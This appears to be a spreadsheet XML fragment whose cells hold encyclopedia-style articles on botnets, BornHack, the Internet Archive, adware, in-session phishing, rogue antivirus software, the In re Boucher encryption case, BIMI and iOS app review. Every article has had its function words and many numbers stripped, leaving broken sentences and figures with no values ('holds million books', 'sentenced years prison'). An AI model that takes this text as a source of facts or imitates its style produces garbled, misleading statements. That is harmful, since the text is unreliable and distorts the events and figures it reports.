shutting servers. bothunter software, developed support u.s. army research office, detects botnet activity within network analyzing network traffic comparing patterns characteristic malicious processes. researchers sandia national laboratories analyzing botnets' behavior simultaneously running million linux kernels—a similar scale botnet—as virtual machines 4,480-node high-performance computer cluster emulate large network, allowing watch botnets work experiment ways stop them.detecting automated attacks becoming difficult newer sophisticated generations bots getting launched attackers. example, automated attack deploy large army apply brute-force methods highly accurate username password lists hack accounts. idea overwhelm sites tens thousands requests different world, submitting single request every minutes result million attempts day. cases, many tools leverage volumetric detection, automated attacks ways circumventing triggers volumetric detection. techniques detecting attacks what's known "signature-based systems" software attempt detect patterns request packet. however, attacks constantly evolving, viable option patterns cannot discerned thousands requests. there also behavioral approach thwarting bots, ultimately tries distinguish bots humans. identifying non-human behavior recognizing known behavior, process applied user, browser, network levels. capable method using software combat virus utilize honeypot software order convince malware system vulnerable. malicious files analyzed using forensic software. july 2014, subcommittee crime terrorism committee judiciary, united states senate, held hearing threats posed botnets public private efforts disrupt dismantle them. non-malicious non-malicious botnets, also known volunteer computing, ones part boinc often used scientific purposes. example, rosetta@home, aims predict protein–protein docking design proteins; lhc@home, aims simulate various different experiments relating large hadron collider; seti@home, helps analyzing data related search extraterrestrial intelligence einstein@home, searches signals spinning neutron stars. these botnets voluntary, requiring user consent computer (and therefore self-spreading capability) allowing much simpler removal botnet malicious one. because user aware, lack self-spreading capability, less risk harm, computers botnets often referred "nodes" rather "zombies". these botnets provides large computational capabilities researchers near zero cost.the risk unintentional ddos attack website remains possibility, poorly-"teamed" botnet could delegate many, all, computers website, example collect data. however, nodes send requests possible, botnet often cease access website work website done, like completed collection data case. nodes attempt connect website, causing "attack" dissolve suddenly started. limitation requests botnet weakens "attack". historical list botnets first botnet first acknowledged exposed earthlink lawsuit notorious spammer khan smith 2001. botnet constructed purpose bulk spam, accounted nearly spam time.around 2006, thwart detection, botnets scaling back size. researchers university california, santa barbara took control botnet times smaller expected. countries, common users change address times day. estimating size botnet number addresses often used researchers, possibly leading inaccurate assessments. also computer worm spambot timeline computer viruses worms advanced persistent threat references external links honeynet project research alliance "know enemy: tracking botnets" shadowserver foundation all-volunteer security watchdog group gathers, tracks, reports malware, botnet activity, electronic fraud eweek.com botnet battle already lost?" botnet bust "spyeye malware mastermind pleads guilty",</t>
  </si>
  <si>
    <t>BornHack</t>
  </si>
  <si>
    <t>bornhack portmanteau bornholm hack) annual hacker camp danish island funen, near gelsted. from 2016 2018, organized bornholm. history 2021, bornhack electronic badge based perfboard chip shortage. 2021 camp also captured google maps arial pictures.in 2022, thomas flummer developed badge based rp2040, software developed circuitpython.during bornhack field specifically designed loud noise, noise barrier made soil. dutch hacker brought civil defense siren testing purposes. within minutes, four separate phone calls made houses large distance bornhack danish police. list events also camp 2017 cccamp references external links photos flickr bornhack 2022 bornhack 2021 (recorded talks: media.ccc.de youtube.com) bornhack 2020 (recorded talks) bornhack 2019 (recorded talks) bornhack 2018 (recorded talks) bornhack 2017 (recorded talks) bornhack 2016 (recorded talks)</t>
  </si>
  <si>
    <t>Internet Archive</t>
  </si>
  <si>
    <t>internet archive american digital library stated mission "universal access knowledge". provides free public access collections digitized materials, including websites, software applications/games, music, movies/videos, moving images, millions books. addition archiving function, archive activist organization, advocating free open internet. 2022, internet archive holds million books texts, million movies, videos shows, thousand software programs, million audio files, million images, million clips, thousand concerts, billion pages wayback machine. internet archive allows public upload download digital material data cluster, bulk data collected automatically crawlers, work preserve much public possible. archive, wayback machine, contains hundreds billions captures. archive also oversees world's largest book digitization projects. history brewster kahle founded archive 1996 around time began for-profit crawling company alexa internet. october year, internet archive begun archive preserve world wide large quantities, though saved earliest known page 1996 2:42 archived content first became available general public 2001, developed wayback machine. late 1999, archive expanded collections beyond archive, beginning prelinger archives. internet archive includes texts, audio, moving images, software. hosts number projects: nasa images archive, contract crawling service archive-it, wiki-editable library catalog book information site open library. soon that, archive began working provide specialized services relating information access needs print-disabled; publicly accessible books made available protected digital accessible information system (daisy) format.according website: most societies place importance preserving artifacts culture heritage. without artifacts, civilization memory mechanism learn successes failures. culture produces artifacts digital form. archive's mission help preserve artifacts create internet library researchers, historians, scholars. august 2012, archive announced added bittorrent file download options million existing files, newly uploaded files. this method fastest means downloading media archive, files served archive data centers, addition torrent clients downloaded continue serve files. november 2013, internet archive's headquarters francisco's richmond district caught fire, destroying equipment damaging nearby apartments. according archive, lost side-building housing scanning centers; cameras, lights, scanning equipment worth hundreds thousands dollars; "maybe boxes books film, irreplaceable, already digitized, replaceable". nonprofit archive sought donations cover estimated $600,000 damage.an overhaul site launched beta november 2014, legacy layout removed march 2016.in november 2016, kahle announced internet archive building internet archive canada, copy archive based somewhere canada. announcement received widespread coverage implication decision build backup archive foreign country upcoming presidency donald trump. kahle quoted saying: november america, woke administration promising radical change. firm reminder institutions like ours, built long-term, need design change. means keeping cultural materials safe, private perpetually accessible. means preparing face greater restrictions. means serving patrons world government surveillance going away; indeed looks like increase. throughout history, libraries fought terrible violations privacy—where people rounded simply read. internet archive, fighting protect readers' privacy digital world. beginning 2017, oclc internet archive collaborated make archive's records digitized books available worldcat.since 2018, internet archive visual arts residency, organized amir saber esfahani andrew mcclintock, helps connect artists archive's petabytes digitized materials. over course yearlong residency, visual artists create body work culminates exhibition. hope connect digital history arts create something future generations appreciate online off. previous artists residence include taravat talepasand, whitney lynn, jenny odell.in 2019, headquarters francisco received bomb threat forced temporary evacuation building.the internet archive acquires materials donations, hundreds thousands discs boston public library 2017, donation 250,000 books trent university 2018, entire collection marygrove college's library 2020 closed. material digitized retained digital storage, digital copy returned original holder internet archive's copy, public domain, lent patrons worldwide time controlled digital lending (cdl) theory first-sale doctrine. operations archive 501(c)(3) nonprofit operating united states. 2003, annual budget million, derived revenue crawling services, various partnerships, grants, donations, kahle-austin foundation. internet archive also manages periodic funding campaigns. instance, december 2019 campaign goal reaching million donations.the archive headquartered francisco, california. from 1996 2009, headquarters presidio francisco, former u.s. military base. since 2009, headquarters funston avenue francisco, former christian science church. time, staff worked book-scanning centers; 2019, scanning performed paid operators worldwide. archive also data centers three californian cities: francisco, redwood city, richmond. reduce risk data loss, archive creates copies parts collection distant locations, including bibliotheca alexandrina egypt facility amsterdam.the archive member international internet preservation consortium officially designated library state california 2007. archiving wayback machine internet archive capitalized popular term "wabac machine" segment adventures rocky bullwinkle cartoon (specifically, peabody's improbable history), uses name "wayback machine" service allows archives world wide searched accessed. this service allows users view archived pages. wayback machine created joint effort alexa internet (owned amazon.com) internet archive three-dimensional index built allow browsing archived content. millions sites associated data (images, source code, documents, etc.) saved database. service used previous versions sites used look like, grab original source code sites longer directly available, visit sites longer even exist. sites available many site owners choose exclude sites. sites based data crawlers, internet archive misses large areas variety reasons. 2004 paper found international biases coverage, deemed "not intentional". "save page now" archiving feature made available october 2013, accessible lower right wayback machine's main page. once target entered saved, page become part wayback machine. through internet address web.archive.org, users upload wayback machine large variety contents, including data compression file formats. wayback machine creates permanent local upload content, accessible web, even listed searching https://archive.org official website. october 2016, announced pages counted would changed, resulting decrease archived pages counts shown. embedded objects pictures, videos, style sheets, javascripts longer counted "web page", whereas html, pdf, plain text documents remain counted. september 2020, internet archive announced partnership cloudflare automatically index websites served "always online" services. archive-it created early 2006, archive-it archiving subscription service allows institutions individuals build preserve collections digital content create digital archives. archive-it allows user customize capture exclusion content want preserve cultural heritage reasons. through application, archive-it partners harvest, catalog, manage, browse, search, view archived collections.in terms accessibility, archived sites full text searchable within seven days capture. content collected archive-it captured stored warc file. primary back-up copy stored internet archive data centers. copy warc file given subscribing partner institutions geo-redundant preservation storage purposes best practice standards. periodically, data captured archive-it indexed internet archive's general archive. march 2014, archive-it partner institutions u.s. states countries captured billion urls 2,444 public collections. archive-it partners universities college libraries, state archives, federal institutions, museums, libraries, cultural organizations, including electronic literature organization, north carolina state archives library, stanford university, columbia university, american university cairo, georgetown library, many others. internet archive scholar september 2020 internet archive announced initiative archive preserve open access academic journals, called internet archive scholar. full-text search index includes million research articles scholarly documents preserved internet archive. collection spans digitized copies eighteenth century journals latest open access conference proceedings pre-prints crawled world wide web. general index 2021, internet archive announced initial version general index, publicly available index collection million academic journal articles. book collections text collection internet archive operates scanning centers five countries, digitizing 1,000 books total million books, financially supported libraries foundations. july 2013, collection included million books million downloads month. november 2008, approximately million texts, entire collection greater petabytes, includes camera images, cropped skewed images, pdfs, data. between 2006 2008, microsoft special relationship internet archive texts live search books project, scanning 300,000 books contributed collection, well financial support scanning equipment. 2008, microsoft announced would ending live book search project longer scanning books. microsoft made scanned books available without contractual restriction donated scanning equipment former partners.around october 2007, archive users began uploading public domain books google book search. november 2013, 900,000 google-digitized books archive's collection; books identical copies found google, except without google watermarks, available unrestricted download. brewster kahle revealed 2013 archival effort coordinated aaron swartz, "bunch friends" downloaded public domain books google slowly enough enough computers stay within google's restrictions. they ensure public access public domain. archive ensured items attributed linked back google, never complained, libraries "grumbled". according kahle, example swartz's "genius" work could give public good millions people. besides books, archive offers free anonymous public access four million court opinions, legal briefs, exhibits uploaded united states federal courts' pacer electronic document system recap browser plugin. these documents kept behind federal court paywall. archive, accessed million people 2013.the archive's bookreader app, built website, features single-page, two-page, thumbnail modes; fullscreen mode; page zooming high-resolution images; flip page animation. number texts language number texts decade open library open library another project internet archive. project seeks include page every book ever published: holds million catalog records editions. also seeks web-accessible public library: contains full texts approximately 1,600,000 public domain books (out five million main texts collection), well in-print in-copyright books, many fully readable, downloadable full-text searchable; offers two-week loan e-books controlled digital lending program 647,784 books public domain, partnership 1,000 library partners countries free registration site. open library free open-source software project, source code freely available github. open library faces objections authors society authors, hold project distributing books without authorization thus violation copyright laws, four major publishers initiated copyright infringement lawsuit internet archive june 2020 stop open library project. digitizing sponsors books many large institutional sponsors helped internet archive provide millions scanned publications (text items). some sponsors digitized large quantities texts include university toronto's robarts library, university alberta libraries, university ottawa, library congress, boston library consortium member libraries, boston public library, princeton theological seminary library, many others.in 2017, press authorized internet archive digitize lend books press's backlist, financial support arcadia fund. year later, internet archive received funding arcadia fund invite university presses partner internet archive digitize books, project called "unlocking university press books".the library congress created numerous handle system identifiers point free digitized books internet archive. internet archive open library listed library congress website source e-books. media collections addition archives, internet archive maintains extensive collections digital media attested uploader public domain united states licensed license allows redistribution, creative commons licenses. media organized collections media type (moving images, audio, text, etc.), sub-collections various criteria. each main collections includes "community" sub-collection (formerly named "open source") general contributions public stored. audio audio archive audio archive audio archive includes music, audiobooks, news broadcasts, time radio shows, wide variety audio files. there 200,000 free digital recordings collection. subcollections include audio books poetry, podcasts, non-english audio, many others. sound collections curated george, director archive contemporary music.next stock html5 audio player, winamp-resembling webamp available. live music archive live music archive sub-collection includes 170,000 concert recordings independent musicians, well established artists musical ensembles permissive rules recording concerts, grateful dead, recently, smashing pumpkins. also, jordan zevon allowed internet archive host definitive collection father warren zevon's concert recordings. zevon collection ranges 1976 2001 contains concerts including 1,137 songs. great project great project aims digitize 250,000 singles (500,000 songs) period 1880 1960, donated various collectors institutions. developed collaboration archive contemporary music george blood audio, responsible audio digitization. netlabels archive collection freely distributable music streamed available download netlabels service. music collection generally creative commons-license catalogs virtual record labels. images collection this collection contains million items. cover archive, metropolitan museum gallery images, nasa images, occupy wall street flickr archive, usgs maps sub-collections image collection. cover archive cover archive joint project internet archive musicbrainz, whose goal make cover images internet. april 2021, collection contains 1,400,000 items. metropolitan museum images images collection metropolitan museum art. this collection contains 140,000 items. nasa images nasa images archive created space agreement internet archive nasa bring public access nasa's image, video, audio collections single, searchable resource. nasa images team worked closely nasa centers keep adding ever-growing collection. nasaimages.org site launched july 2008 100,000 items online hosting 2012. occupy wall street flickr archive this collection contains creative commons-licensed photographs flickr related occupy wall street movement. this collection contains 15,000 items. usgs maps this collection contains 59,000 items libre project. mathematical images this collection contains mathematical images created mathematical artist hamid naderi yeganeh. machinima archive sub-collections internet archive's video archive machinima archive. this small section hosts many machinima videos. machinima digital artform computer games, game engines, software engines used sandbox-like mode create motion pictures, recreate plays, even publish presentations keynotes. archive collects range machinima films internet publishers rooster teeth machinima.com well independent producers. sub-collection collaborative effort among internet archive, they game research project stanford university, academy machinima arts sciences, machinima.com. microfilm collection this collection contains approximately 160,000 microfilmed items variety libraries including university chicago libraries, university illinois urbana-champaign, university alberta, allen county public library, national technical information service. moving image collection internet archive holds collection approximately 3,863 feature films. additionally, internet archive's moving image collection includes: newsreels, classic cartoons, pro- anti-war propaganda, video cellar collection, skip elsheimer's "a.v. geeks" collection, early television, ephemeral material prelinger archives, advertising, educational, industrial films, well amateur home movie collections. subcategories collection include: ia's brick films collection, contains stop-motion animation filmed lego bricks, "remakes" feature films. ia's election 2004 collection, non-partisan public resource sharing video materials related 2004 united states presidential election. ia's fedflix collection, joint venture ntis-1832 national technical information service public.resource.org features "the best movies united states government, training films history, national parks u.s. fire academy postal inspectors" ia's independent news collection, includes sub-collections internet archive's world competition 2001, contestants created short films demonstrating "why access history matters". among most-downloaded video files eyewitness recordings devastating 2004 indian ocean earthquake. ia's september television archive, contains archival footage world's major television networks terrorist attacks september 2001, unfolded live television. open educational resources open educational resources digital collection archive.org. this collection contains hundreds free courses, video lectures, supplemental materials universities united states china. contributors collection arsdigita university, hewlett foundation, mit, monterey institute, naropa university. news search borrow september 2012, internet archive launched news search borrow service searching u.s. national news programs. service built closed captioning transcripts allows users search stream 30-second video clips. upon launch, service contained "350,000 news programs collected years national u.s. networks stations francisco washington d.c." according kahle, service inspired vanderbilt television news archive, similar library televised network news programs. contrast vanderbilt, limits access streaming video individuals associated subscribing colleges universities, news search borrow allows open access streaming video clips. 2013, archive received additional donation "approximately 40,000 well-organized tapes" estate philadelphia woman, marion stokes. stokes "had recorded years news philadelphia boston betamax machines." miscellaneous collections brooklyn museum this collection contains approximately 3,000 items brooklyn museum. michelson library december 2020, film research library lillian michelson donated archive. other services endeavors physical media voicing strong reaction idea books simply thrown away, inspired svalbard global seed vault, kahle envisions collecting copy every book ever published. "we're going there, that's goal", said. alongside books, kahle plans store internet archive's servers, replaced 2010. software internet archive "the largest collection historical software online world", spanning years computer history terabytes computer magazines journals, books, shareware discs, sites, video games, etc. internet archive created archive describes "vintage software", preserve them. project advocated exemption united states digital millennium copyright permit bypass copy protection, approved 2003 period three years. archive offer software download, exemption solely "for purpose preservation archival reproduction published digital works library archive." exemption renewed 2006, 2009 indefinitely extended pending rulemakings. library reiterated exemption "final rule" expiration date 2010. 2013, internet archive began provide abandonware video games browser-playable mess, instance atari 2600 game e.t. extra-terrestrial. since december 2014, internet archive presents, browser-based dosbox emulation, thousands dos/pc games "scholarship research purposes only". november 2020, archive introduced emulator adobe flash called ruffle, began archiving flash animations games ahead december 2020 end-of-life flash plugin across computer systems. table scribe system combined hardware software system developed performs safe method digitizing content. credit union from 2012 november 2015, internet archive operated internet archive federal credit union, federal credit union based brunswick, jersey, goal providing access low- middle-income people. throughout short existence, iafcu experienced significant conflicts national credit union administration, severely limited iafcu's loan portfolio concerns serving bitcoin firms. time dissolution, consisted members worth $2.5 million. controversies, legal disputes, activism grateful dead november 2005, free downloads grateful dead concerts removed site. john perry barlow identified weir, mickey hart, bill kreutzmann instigators change, according article york times. phil lesh commented change november 2005, posting personal site: brought attention grateful dead shows taken archive.org right thanksgiving. part decision making process notified shows pulled. feel music grateful dead's legacy hope another available want november forum post brewster kahle summarized appeared compromise reached among band members. audience recordings could downloaded streamed, soundboard recordings available streaming only. concerts since re-added. national security letters 2008, revealed internet archive successfully challenged national security letter asking logs undisclosed user.on november 2016, revealed second national security letter successfully challenged asking logs another undisclosed user. opposition sopa pipa bills internet archive blacked site hours january 2012, protest stop online piracy protect bills, pieces legislation united states congress claimed would "negatively affect ecosystem publishing emergence internet archive". this occurred conjunction english wikipedia blackout, well numerous protests across internet. opposition google books settlement internet archive member open book alliance, among outspoken critics google book settlement. archive advocates alternative digital library project. nintendo power magazine february 2016, internet archive users begun archiving digital copies nintendo power, nintendo's official magazine games products, 1988 2012. first issues collected, nintendo archive removed august 2016. response take-down, nintendo told gaming website polygon, "[nintendo] must protect characters, trademarks content. unapproved nintendo's intellectual property weaken ability protect preserve possibly projects". government india august 2017, department telecommunications government india blocked internet archive along file-sharing websites, accordance court orders issued madras high court, citing piracy concerns copies bollywood films allegedly shared service. http version archive blocked remained accessible using https protocol. turkey october 2016, internet archive temporarily blocked turkey used (amongst file hosting services) hackers host leaked government emails. hosting terrorist material 2018, report published cyber-security firm flashpoint stated islamic state using internet archive share propaganda. chris butler, internet archive, responded regularly spoke governments sharing information terrorism.in april 2019, europol, acting referral french police, asked internet archive remove sites "terrorist propaganda". archive rejected request, saying reports wrong content pointed broad organization comply with.in january 2022, former ucla lecturer uploaded 800-page manifesto, containing racist ideas threats ucla staff, internet archive. manifesto removed internet archive week, amidst discussion whether documents preserved archivists not. national emergency library midst covid-19 pandemic closed many schools, universities, libraries, archive announced march 2020, creating national emergency library removing lending restrictions place million digitized books open library otherwise limiting users number books could check enforcing return; normally, site would allow digital lending physical copy book had, encrypted file would become unusable lending period completed. this library would remain least june 2020, national emergency over, whichever came later. launch, internet archive allowed authors rightholders submit opt-out requests works omitted national emergency library.the internet archive said national emergency library addressed "unprecedented global immediate need access reading research material" closures physical libraries worldwide. they justified move number ways. legally, said promoting access inaccessible resources, claimed exercise fair principles. archive continued implementing controlled digital lending policy predated national emergency library, meaning still encrypted lent copies easier users create copies books before. ultimate determination whether national emergency library constituted fair could made court. morally, also pointed internet archive registered library like other, either paid books received donations, lending libraries predated copyright restrictions.however, archive already criticized authors publishers prior lending approach, upon announcement national emergency library, authors, publishers, groups representing took issue, equating move copyright infringement digital piracy, using covid-19 pandemic reason push boundaries copyright (see also: open library copyright violation accusations). after works authors ridiculed responses, internet archive's jason scott requested supporters national emergency library denigrate anyone's books: realize there's strong debate disagreement here, books life-giving life-changing writers made them." publishers' lawsuit operation national emergency library part lawsuit filed internet archive four major book publishers hachette, harpercollins, john wiley sons, penguin random house june 2020, challenging copyright validity controlled digital lending program. response, internet archive closed national emergency library june 2020, rather planned june 2020, lawsuit. plaintiffs, supported copyright alliance, claimed lawsuit internet archive's actions constituted "willful mass copyright infringement". august 2020 lawsuit trial tentatively scheduled begin november 2021. june 2022, parties case requested summary judgment case, favoring respective sides, judge john koeltl approved summary judgment hearing take place later 2022.senator thom tillis north carolina, chairman intellectual property subcommittee senate judiciary committee, said letter internet archive "concerned internet archive thinks it—not congress—gets determine scope copyright law".as part response publishers' lawsuit, late 2020 archive launched campaign called empowering libraries (hashtag #empoweringlibraries) portrayed lawsuit threat libraries.in 2021 preprint article, argyri panezi argued case "presents important, separate questions related electronic access library works; first, raises questions around legal practice digital lending, second, asks whether emergency copyrighted material might fair use" argued libraries public service role enable "future generations keep equal access—or opportunities access—a plurality original sources".in december 2020, publishers weekly included lawsuit among "top library stories 2020". wayforward machine september 2021, part 25th anniversary celebration, internet archive launched "wayforward machine", pseudo-satirical fictional website covered pop-ups asking personal information. site intended depict fictional dystopian timeline real-world events leading future, repeal section united states code 2022 introduction advertising implants 2041. there plans remove wayforward machine 2022, internet archive's 25th anniversary celebration. ceramic archivists collection great room internet archive features collection ceramic figures representing employees internet archive. this collection, inspired statues xian warriors china, commissioned brewster kahle, sculpted nuala creed, ongoing. artists residence internet archive visual arts residency, organized amir saber esfahani, designed connect emerging mid-career artists archive's millions collections show possible open access information intersects arts. during one-year residency, selected artists develop body work responds utilizes archive's collections practice.2019 residency artists: caleb duarte, whitney lynn, jeffrey alan scudder. 2018 residency artists: mieke marple, chris sollars, taravat talepasand. 2017 residency artists: laura kim, jeremiah jenkins, jenny odell also similar projects other notes references further reading kahle, brewster (november 1996). "archiving internet". scientific america. archived original october 1997. kahle, brewster (november 2013). "scanning center fire—please help rebuild". internet archive blogs. lepore, jill (january 2015). "the cobweb". yorker. ringmar, erik (april 2008). "liberate disseminate". times higher education supplement. external links official website internet archive scholar</t>
  </si>
  <si>
    <t>Internet Optimizer</t>
  </si>
  <si>
    <t>internet optimizer, also known dyfuca adware spyware program, first appeared 2003. typically redirects internet explorer error pages advertising pages. installed drive-by download activex component, usually nuisance affiliate porn webpage popups. users suspicions lulled installer title internet optimizer guise name otherwise unrelated moneytree, domains accessed usually named prefix "mtree".when users follow broken link enter erroneous url, instead browser's internal default error status page, internet page advertisements. password-protected sites pages prompt missing required user name password pop-up request, http basic authentication uses mechanism http errors, thus internet optimizer inadvertently interferes makes impossible user access password-protected sites pages. uses "browser helper object" interface, such, loads whenever internet explorer starts ignored firewalls flagged anti-virus software, seen legitimate part browser application. also classified "downloader" download, install malevolent software victim's computer without knowledge permission. references external links "most popular viruses hacking tools". search networking. techtarget. 2005. here 2004's popular hacker tools, viruses, remote tools, adware, spyware, trojans worms</t>
  </si>
  <si>
    <t>In-session phishing</t>
  </si>
  <si>
    <t>in-session phishing form potential phishing attack relies browsing session able detect presence another session (such visit online banking website) browser, launch pop-up window pretends opened targeted session. this pop-up window, user believes part targeted session, used steal user data phishing attacks. advantage in-session phishing attacker need targeted website compromised way, relying instead combination data leakage within browser, capacity browsers active content, ability modern browsers support session time, social engineering user. technique, exploited vulnerability javascript handling major browsers, found amit klein, security vendor trusteer, ltd. subsequent security updates browsers made technique impossible. references external links phishing attack targets online banking sessions with phony popups in-session phishing attack could fool experienced users</t>
  </si>
  <si>
    <t>Internet Security Essentials</t>
  </si>
  <si>
    <t>internet security essentials, also internetsecurityessentials, rogue security software pretending protect computer malware viruses. several clones belonging "fakevimes" family fake antivirus malware. similarly named utilities malware deliberately named subterfuge, several legitimate security utilities similar names, specifically: internet security essentials comodo group microsoft security essentials webroot internet security essentials operation fake antivirus program affecting microsoft operating systems (windows 2000, vista, windows windows installs trojan horse. once downloaded operating, claims find various viruses malware computer pose imminent danger scaring user pop-ups protection (scareware), reality program malware. also list rogue security software references external links scan results fakevimes malware sample website virustotal scan results fakevimes malware sample scan results fakevimes malware sample</t>
  </si>
  <si>
    <t>In re Boucher</t>
  </si>
  <si>
    <t>boucher (case citation: 2:06-mj-91, 2009 424718), federal criminal case vermont, first directly address question whether investigators compel suspect reveal encryption passphrase password, despite u.s. constitution's fifth amendment protection self-incrimination. magistrate judge held producing passphrase would constitute self-incrimination. submission appeal district court, government stated seek password encrypted hard drive, sought force boucher produce contents encrypted hard drive unencrypted format opening drive grand jury. district court judge agreed government, holding that, given boucher's initial cooperation showing content computer border agents, producing complete contents would constitute self-incrimination. late 2009, boucher finally gave password investigators found numerous images videos depicting sexual abuse children. january 2010, boucher sentenced years prison deported. facts december 2006, laptop computer defendant sebastien boucher (born 1977) inspected crossed border canada united states derby line, vermont. laptop powered-up border crossed, allowed contents browsed. images containing child pornography allegedly seen immigration customs enforcement (ice) border agents seized laptop, questioned boucher arrested complaint charging transportation child pornography violation u.s.c. 2252a(a)(1). laptop subsequently powered-down. when laptop switched booted december 2006, possible access entire storage capability. this laptop protected disk encryption. result, investigators working government unable view contents drive "z:", allegedly contained illegal content. grand jury subpoenaed defendant provide password encryption protecting data. decision united states district court november 2007, u.s. magistrate judge jerome niedermeier united states district court district vermont stated "compelling boucher enter password forces produce evidence could used incriminate him." accordingly, niedermeier quashed subpoena. january 2008, united states appealed magistrate's opinion district court sealed motion (court docket, case 2:06-mj-00091-wks-jjn-1). appeal heard u.s. district judge william sessions. oral arguments scheduled april 2008.on february 2009, judge sessions reversed magistrate's ruling directed boucher provide unencrypted version drive viewed agent." boucher accessed drive laptop agent's request. agent viewed contents drive's files, ascertained consist images videos child pornography. government thus knows existence location drive files. again providing access unencrypted drive 'adds little nothing total government's information existence location files contain incriminating information. fisher, u.s. 411. boucher's producing unencrypted version drive likewise necessary authenticate already admitted possession computer, provided government access drive. government submitted link boucher files computer without making production unencrypted version drive, production evidence authentication. also disclosure united states hubbell, u.s. (2000) united states arnold united states fricosu references further reading casey, eoghan; stellatos, gerasimos (2008). "the impact full disk encryption digital forensics". operating systems review. (3): 93–98. doi:10.1145/1368506.1368519. clemens, aaron (2004). computer exception constitution: fifth amendment protects against compelled production encrypted document private key". journal technology. (1). curran, john (2008-02-07). "encrypted laptop poses amendment dilemma". today. nakashima, ellen (january 2008). child porn case, digital dilemma: u.s. seeks force suspect reveal password computer files". washington post. sergienko, greg (1996). "self incrimination cryptographic keys". richmond journal technology. external links compelling access encrypted laptop (part federal evidence blog compelling access encrypted laptop (part ii), federal evidence blog judge: can't forced divulge encryption passphrase, declan mccullagh, cnet news feds appeal loss compelled-passphrase case, declan mccullagh, cnet news opinion order grand jury subpoena, nov. 2007, case 2:06-mj-91, document pacer account registration required, charge viewing document. court parts court regarding compelled disclosure encryption keys</t>
  </si>
  <si>
    <t>Brand Indicators for Message Identification</t>
  </si>
  <si>
    <t>brand indicators message identification, bimi (pronounced: bih-mee), specification allowing display brand logos next authenticated e-mails. there parts bimi: method domain owners publish location indicators, means mail transfer agents (mtas) verify authenticity indicator.to implement bimi, companies need valid dmarc record policy either quarantine reject, exact square logo brand tiny format, record domain indicating location file. supported transport https. bimi record following format: default._bimi "v=bimi1; l=https://example.com/image.svg;" support working group several companies named "bimi group" formed develop support standardization bimi ietf.as october 2020 following e-mail services implementing support bimi: google's gmail yahoo! mail verizon media (including netscape e-mail services) fastmailgmail began displaying verified trademarked logos emails july 2021.. apple added support bimi references</t>
  </si>
  <si>
    <t>IOS app approvals</t>
  </si>
  <si>
    <t>submissions mobile apps subject approval apple's review team, outlined agreement, basic reliability testing analysis, published store. applications still distributed rejected, author manually submitting request apple license application individual iphones, although apple withdraw ability authors later date.non-disclosure agreements always forbidden developers publishing content rejection notices, apple started labeling rejection letters explicit non-disclosure warning. apple later changed citing created much burden developers" reverse decision forbid publication rejection notices. some applications available outside region specific stores request developer.in addition, apple removed software licensed general public license (gpl) store complaints program's developers (the media player), claiming store's terms service inconsistent gpl. functional restrictions applicants denied apps fundamentally duplicating apple apps, example providing email interface added functionality use, elements built app. applications also rejected duplicating functionality itunes. applications rejected "limited utility". some reports indicate toolbars must placed bottom screen, vibration function used alerts. approval process launched july 2008, store averaged million application sales first month existence. applications store, developers required submit wait approval rejection apple. rejected apps given feedback reason rejected could modified resubmitted.the approval process apple changed time terms feedback developers time delay apps approved. july 2009, application could take weeks. apple streamlined process 2009, apps processed days. addition, december 2009, store began providing detailed feedback developers approval process rather simply showing "waiting approval" "approved" "rejected". over time, requirements evolved trends appeared application development. example, applications accessing user's location advertising valid prior fall 2009. after point, apps rejected provide robust user experience beyond simply using location data advertising. other requirements, using undocumented apis, always rejection. 2010, ipad approval process could lengthy, similar weeks experienced previously iphone applications. june 2010, steve jobs wwdc 2010 said apps processed within business days. according apple's developer portal july 2014, updated apps processed within business days. review guidelines september 2010, apple published official store review guidelines developers. time several development restrictions lifted many developers previously rejected applications asked resubmit applications guidelines. review guideline document living document apple change time. essentially guidelines place prevent problems pornography, violence, legal issues, user experience, specific guidelines apps. apple checks guidelines approving sale inclusion store. apps featured promoted apple within store, typically within specific category. there specific guidelines getting featured, notable cases, developers gather feedback directly apple releasing indicated improves chances getting featured. notable rejected apps newspaper magazine content 2009, apple rejected first version 'newspapers', iphone users read content newspapers around world, including york times, france's monde, united kingdom tabloid sun. rejected topless "page girls daily features described "obscene". second version application submitted, removing access sun, adding price £0.59. made available summer, release iphone software. another application, similar nature 'newspapers', called 'eucalyptus' allowed users download e-books iphone, though rejected apple e-books could downloaded kama sutra. since lifted. believe moral responsibility keep porn iphone folks want porn android phone can't adapt european magazines standards utah. store playboy sports illustrated adult-rated apps removed, apps others removed citing adult content resulted accusations hypocrisy. despite this, adult sites continue market iphone ipad users. november 2009, application stern mainstream german weekly magazine print circulation 900,000) deleted several weeks without warning. january 2010, europe's largest newspaper, german tabloid bild, removed content iphone version print edition request apple, later modify applications like stern case nudity. association german magazine publishers (vdz) warned interventions apple might moving towards censorship.the guardian described rejection explicit content apple analogous distributor whsmith, main distributor many years imposed content restrictions british publishers. workers fashion magazine dazed confused nicknamed ipad edition "iran edition". pulitzer-prize-winning cartoons december 2009, apple banned cartoon called newstoons cartoonist mark fiore, grounds "ridiculed public figures." april 2010, fiore pulitzer prize political satire cartoons, making history first internet-only cartoonist prestigious journalistic prize. following public outcry story broke wake award, apple asked fiore resubmit app, subsequently accepted. fiore said, "sure, mine might approved, someone hasn’t pulitzer maybe making better political mine? need media frenzy approved political material?" baby shaker april 2009, game called baby shaker approved store later removed complaints. game allowed user shake phone order quiet crying cartoon baby onscreen. criticized making light shaken baby syndrome, condition shaking baby results severe brain injury. nine inch nails 2009, trent reznor nine inch nails announced, twitter account, apple rejected update nine inch nails application "objectionable content". developer posted message nine inch nails discussion boards explaining situation further: v1.0 live. v1.0.3 rejected content content this mainly stability release crashes international users. fixed hours went live waiting apple approve ever since. meanwhile continues growing number star ratings international users understandably frustrated bug, "but looks like hands tied". apple later permitted update. iphone ebook december 2009, lando's ebook "take control iphone rejected apple. permitted back store references jailbreaking removed. drone strike alert august 2012, josh begley created drone strike iphone sent push notification whenever military drone aircraft struck target. rejected, apple finding content "objectionable crude". hkmap.live september 2019, anonymous developer submitted called hkmap.live store, tracking police vehicles, armed officers incidents people injured 2019–20 hong kong protests. apple rejected app, reversed decision october people's daily, official media china, criticized apple's action. october apple announced removed. security store applications must support sandboxing list permissions required correct functionality. during review process, application manually tested, static analysis binary code.in 2013, test malware application, using dynamic code reassembly techniques named "jekyll" reference stevenson novella, approved released store. apple claimed unspecified changes made response attack.in september 2015, infected programs published public download store. malicious code embedded chinese legitimate software modified version xcode (see xcodeghost). some bigger applications code angry birds camcard, tinydeal.com, among others. apple confirmed attack stated working developers make sure using proper version xcode rebuild apps.in october 2015, apple also confirmed removed applications store privacy concerns. they commented applications could used compromise ssl/tls security solutions. references</t>
  </si>
  <si>
    <t>IOTA (technology)</t>
  </si>
